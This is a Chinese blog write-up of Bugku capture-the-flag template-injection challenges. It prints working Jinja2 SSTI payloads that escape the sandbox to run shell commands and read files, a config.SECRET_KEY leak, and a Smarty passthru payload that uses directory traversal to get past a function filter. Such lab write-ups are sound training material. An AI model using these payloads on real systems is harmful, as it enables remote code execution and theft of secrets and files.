Bugku 模板注入做题

最新推荐文章于 2023-08-29 13:26:07 发布
最新推荐文章于 2023-08-29 13:26:07 发布
阅读量1k 收藏 9
点赞数 2
分类专栏: 做题 文章标签: SSTI注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Goodric/article/details/116208769
版权

Bugku 模板注入做题

Simple_SSTI_1

打开场景,页面只显示了一句话,意为:您需要传入一个名为flag的参数。
现在知道传入参数,但是不知道参数 flag 的值是多少。
在这里插入图片描述

尝试传入,发现后面的值会在页面上执行出来。
在这里插入图片描述

F12 打开源代码,看到有一行注释。大概意思是会设置一个 secret_key 变量。
大概 flag 就在这个文件中。
在这里插入图片描述

这里涉及的知识点是服务端模板注入,先对 SSTI 进行了一些学习:
可以用{{config}}获取当前设置,构造 payload:

?flag={{config.SECRET_KEY}}

得到 flag 。
在这里插入图片描述

———
——

Simple_SSTI_2

在这里插入图片描述

打开场景,和前面那题一样,也是出现那句话,不同的是,这题源代码中没有提示,也不知道注入点。
在这里插入图片描述

这里抱着尝试的心态 url 中插入 flag 参数,结果有效,猜对了。
据了解可以直接用工具 tqlmap 扫描出可注入点。
在这里插入图片描述

用错误的语句根据报错可以得到模板的版本,从而可以确定语句的使用规则。
在这里插入图片描述

jinja2是python 的一个模板,收集了两条可以用的语句:
命令执行:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('这里输入命令').read()") }}{% endif %}{% endfor %}

文件操作

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('在这里输入文件名', 'r').read() }}{% endif %}{% endfor %}

这里直接使用 ls 命令:

?flag={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% endif %}{% endfor %}

看到有一个 flag 文件
在这里插入图片描述

接着直接读取文件:
{% for c in [].class.base.subclasses() %}{% if c.name==‘catch_warnings’ %}{{ c.init.globals[‘builtins’].open(‘flag’, ‘r’).read() }}{% endif %}{% endfor %}

得到 flag 。
在这里插入图片描述
——
——

Flask_FileUpload

在这里插入图片描述

和前面一样,也是关于模板的题目。
打开场景,是一个文件上传的场景,并且源码中提示文件后缀必须为 .jpg 和 .png 。
源码的注释中还提示 上传的文件会用python执行。
在这里插入图片描述

那就创建一个文本,后缀改为 .jpg 。
用记事本打开,在里面写入语句(语句来自查找)。system函数可以将字符串转化成命令在服务器上运行。
在这里插入图片描述

上传后得到 flag 。
在这里插入图片描述
——
——

聪明的php

在这里插入图片描述

打开场景,只有一句话。意为传递一个参数并且 flag 的文件名可能是随机的。
在这里插入图片描述

尝试随便传入一个参数,结果得到一段 php 代码。
这个参数不一定是我这个 ,随机都有效果。
并且我们输入的内容在最底下可以显示。
在这里插入图片描述
根据源码,得知是有关 Smarty 模板注入的题。
尝试传入:

?flag={{2*3}}

成功回显。
在这里插入图片描述
准备构造语句,源码中显示过滤了很多函数,像 system 、cat、eval 等都不能使用。

先用 ls 命令查看目录中的文件,但是没有发现有效的信息。
本来想尝试查看每一个文件内容找到 flag 。(查看文件命令在后面)
但是源码显示应该是有一个文件名被过滤掉了,就是那个 template.html ,估计 flag 就在这里面,其他文件经过查看无 flag 。
在这里插入图片描述

PHP提供了4种方法执行系统外部命令:

exec()、passthru()、system()、shell_exec()。

字符 exec、system 都被过滤了。
所有这里用 passthru 函数代替 system ,再用 more 代替 cat 使用。
然后也不知道 flag 到底在什么位置,直接用目录遍历的方法读取文件。
也不知道读什么文件,使用通配符,把所有文件内容都读取出来。
构造:

?flag={passthru(‘more …/…/…/?*’)}

得到 flag 。
在这里插入图片描述

附:
一些 Linux 命令:

ls 查看目录中的文件 。
cat file1 从第一个字节开始正向查看文件的内容
more file1 查看一个长文件的内容
less file1 类似于 ‘more’ 命令,但是它允许在文件中和正向操作一样的反向操作
head -2 file1 查看一个文件的前两行
tail -2 file1 查看一个文件的最后两行

Goodric
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
BugKu 刷题笔记】【Simple_SSTI_1】
一个程序员
02-20 1442
文章目录0x01 题目0x02 题解0x03 知识点1. flask 与 secret_key2. 模板注入 0x01 题目 0x02 题解 输入url为: http://114.67.175.224:19636/?flag={{config.SECRET_KEY}} 即可得到flag 0x03 知识点 初学者, 在网上搜解题思路很容易可以找到。 但是不知其所以然所以整理一下知识点: 包含以下知识点: 1. flask 与 secret_key flask是一个轻量级的可定制框架,使用Python语言
Flask框架中环境变量的配置
IT之一小佬的博客
08-13 2265
Flask框架中环境变量的配置
flask app.config['SECRET_KEY'] = '123456'
linghugoolge的博客
12-30 3838
问题: 在flask项目中,Session, Cookies以及一些第三方扩展都会用到SECRET_KEY值,这是一个比较重要的配置值。 在使用flask时,我产生了这个错误:the session is unavailable because no secret key was set. Set the secret_key on the a...
Bugku-CTF SSTI ——新手ctf记录
xy7850的博客
09-21 896
目录 Simp_SSTI_1 解题过程 ​ Flask默认配置文件: flask查看配置文件的全局变量的playload: 设置secret_key: Simp_SSTI_2 解题过程: ​参考 Simp_SSTI_1 解题过程 进入场景,看到提示,得到第一条信息:参数名为 flag。 习惯性按F12,查看源码 看到新提示,得到第二条信息:需要flask设置secret_key变量 得到flag。 Flask默认配置文件: { 'D...
SSTI
qq_51301115的博客
05-11 357
Simple_SSTI_1 ?flag={{1*1}} 得到回显1,存在注入点 查看页面源代码,得到提示we often set a secret_key variable flag是通过secret_key方法生成的加密字符串 ?flag={{config.SECRET_KEY}} 得到flag 使用tplmap python tplmap.py -u "url/?flag={{}}" python tplmap.py -u "url/?flag={{}}" --os-shell 提权成功,可以查
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
bugku杂项题writeup
11-22
bugku杂项题writeup
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku题的web类解析
01-29
这个是我自习写的bugku的web的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
详解Python的Flask框架中生成SECRET_KEY密钥的方法
12-24
引子 如果遇到了 Must provide secret_key to use csrf错误提醒,原因就是没有设置secret_key ,在代码中加上 app.config[‘SECRET_KEY‘]=‘xxx‘ SECRET_KEY最好不要写在代码中。 最好设置一个config.py文件,从中读取该内容 config.py CSRF_ENABLED = True SECRET_KEY = ‘you-will-never-guess‘ app.py app.config.from_object(‘config‘) 这样就可以防止csrf了。 嗯,接下来我们就来说说这个SECR
寒假不摆烂-Bugku 刷题记录 2022.1.18 第一天 Simple_SSTI_1 Simple_SSTI_2 手工+ tqlmap使用(模板注入神器)
AAAAAAAAAAAA66的博客
01-18 3421
本文章仅作记录用,写的不会很详细,但是如果大家哪里不会可以评论或者私信,互相交流再说一句,本人很菜,共同进步。 这里推荐2个较经典的模板注入例子,漏洞+一道经典的CTF题目 【WEB攻防】Flask(Jinja2) 服务端模板注入漏洞 原理+防御_AAAAAAAAAAAA66的博客-CSDN博客i春秋 afr3 任意文件读取 SSTI flask模板注入 session伪造 详细题解_AAAAAAAAAAAA66的博客-CSDN博客 1. Simple_SSTI_2 题目明显...
BUGKU-CTF入门笔记
Emooooor的博客
11-29 2261
CTF,BUGKU,入门
CTF BugKu平台—(Web篇①)
Aluxian_的博客
12-22 1369
记录一下做题记录 web
[NSSCTF 2nd] 2023 web方向和misc方向题解 wp
Jay17的博客
08-29 1579
[NSSCTF 2nd] 2023 web方向和misc方向题解 wp 全
GACTF2020 - Wannaflag wp
Air_cat的博客
12-30 266
GACTF2020 - Wannaflag 题目链接 十分传统的一个winapi逆向。最近也很少见了,对新人有难度但有趣。 本篇的一些细节之处省略截图,但我会把步骤写明白。若复现不出来可评论或私信。 程序拿到手还有点大,443kb 同时附带了一个flag.bin 进去,打开发现是可读的一串字符串。很显然是被加密过了。 查pe,32位无壳 vs编译(这里我用的exeinfo) ida一打开就定位到了WinMain。这里很容易看出来其只调用了两个自定义函数 – 背景音乐(1b20),消息处理(2280) 进消息
SECRET_KEY&密钥
热门推荐
weixin_42696066的博客
08-23 1万+
SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用,如其名所示,加密的强度取决于变量值的机密度,不同的程序使用不同的密钥 作用:主要是在其加密的过程中作为算法的一个参数,这个值的复杂度影响到了数据传输和存储时的复杂度 考虑到安全性,密钥最好存储在系统的环境变量中 下面生成密钥的一种方法: import os import base64 key = os.uran...
Spring Java config配置secret key
wwwcomy的程序猿感悟
09-27 709
JWT 中的第三部分是个签名,通过JJWT这个组件 [url]https://github.com/jwtk/jjwt[/url]可以很方便的生成/校验/解码Token中的内容,例子如下: 生成JWT: [code="java"]String compactJws = Jwts.builder() .setSubject("Joe") .signWith(SignatureAlgo...
bugku web题解
陶的博客
09-22 217
1、Simple_SSTI_1: 打开场景 查看一下网页源代码 flag在secret_key下 以get方式传递参数flag={{config.SECRET_KEY}}即得到flag。 也就是114.67.246.176:18677/?flag={{config.SECRET_KEY}} SECRET_KEY是config配置里面的一个值 ...
bugku sodirty
最新发布
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制等。 关于具体解题的详细步骤和方法,可以参考解题过程中的记录。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [bugku pwn libc](https://download.csdn.net/download/kety_gz/11656088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值